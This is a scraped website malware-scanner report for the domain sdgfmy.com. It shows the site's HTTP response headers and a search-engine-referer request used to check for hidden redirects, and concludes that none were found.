Cache-Control: private
Date: Mon, 22 Dec 2014 08:02:05 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBQBSSD=DJHFHOLDIBKHPKLMPENPOPKC; path=/
X-Powered-By: ASP.NET

...41441 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: sdgfmy.com
Referer: http://www.google.com/search?q=sdgfmy.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for sdgfmy.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools